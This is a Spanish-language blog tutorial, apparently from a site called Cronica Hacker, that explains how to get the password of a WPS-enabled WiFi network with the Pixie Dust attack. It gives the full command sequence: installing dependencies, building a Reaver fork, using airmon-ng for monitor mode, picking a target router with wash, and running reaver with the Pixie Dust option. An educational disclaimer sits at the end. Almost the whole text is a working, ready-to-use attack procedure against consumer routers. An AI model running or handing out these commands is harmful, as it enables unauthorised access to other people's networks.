Cómo Hackear WiFi Usando el Ataque Pixie Dust sobre WPS

Para nuestros lectores que han solicitado este tutorial. Aquí están los pasos para realizar un ataque Pixie Dust para conseguir contraseña de un WiFi que tenga WPS habilitado.


Nota: Este ataque podría no funcionar bien en todos los routers, pero definitivamente vale la pena probarlo antes de usar un ataque de fuerza bruta contra WPS.

Primero, ¿Que es WPS? WPS significa Wi-Fi Protected Setup y es un estándar de red inalámbrica creada en un intento de hacer las conexiones entre un router y los dispositivos inalámbricos más rápidas y sencillas. Funciona sólo para redes inalámbricas que tienen seguridad WPA Personal o WPA2 Personal. El router al que te vas a conectar tiene un botón de WPS que presionas y también usas la misma opcion en el equipo, tablet o smartphone y puede conectarte automáticamente, en ocasiones por medio de un PIN.

Ahora al tutorial, si estas utilizando Kali Linux probablemente ya estes listo para atacar, pero si no, empieza por aqui:

Paso 1: Descarga todas las dependencias

Es importante descargar todas las dependencias del repositorio antes de proceder con el ataque. Kali Linux incluye algunas de ellas, pero si estás utilizando otra distribución de Linux, puede que no. Así que vamos a listar las que se ocupan.

En primer lugar, escribimos en el terminal:
apt-get update
apt-get install build-essential
apt-get install libpcap-dev
apt-get install sqlite3
apt-get install libsqlite3-dev
apt-get install pixiewps

Es conveniente ejecutar comando por comando ya que hemos experimentado errores al tratar de combinarlos.
Paso 2: Clonar el paquete de GitHub

Este ataque funciona mediante el uso de una variante de Reaver. Vamos a tener que descargar, compilar e instalarlo . Empezamos:

git clone https://github.com/t6x/reaver-wps-fork-t6x

Paso 3: Instalación

Desde tu pwd (directorio actual en la Terminal), escribes:

cd reaver-wps-fork-t6x /
cd src/
./configure
make
make install
o "sudo make install 'si no estás firmado como 'root'

Paso 4: Modo Monitor

Pon tu interfaz en modo monitor usando 'airmon-ng start {interfaz inalámbrica} (usualmente wlan0 pero puedes averiguarlo con un ifconfig)


Paso 5: Identifica tu objetivo
La forma más fácil de encontrar un objetivo con WPS habilitado es

'wash -i {-interfaz del monitor}'

Guarda el BSSID y el numero de canal del router que quieres atacar. Asegúrese de tener una señal fuerte antes de intentar el ataque.


Paso 6: Iniciar el ataque

Una vez que hayas reunido toda la información, simplemente lanzas el siguiente comando:

reaver -i {interfaz de monitor} -b {BSSID del router} -c {canal del router} -vvv -K 1 -f


Paso 7: Voila!

Ahí está la contraseña! Una vez más, este ataque no funciona contra todos los routers, pero definitivamente es más eficaz que un ataque de fuerza bruta (Pixie Dust: máximo 30 minutos vs Brute Force: minutos a DÍAS!)


Aviso Legal: No me gusta escribir esto pero es necesario, Cronica Hacker no se hace responsable del uso de esta la información mostrada aquí, misma que es escrita con fines educativos.
Siguenos:
¿Usas Feedly? Suscribete:
follow us in feedly
Anuncios
Lo Más Popular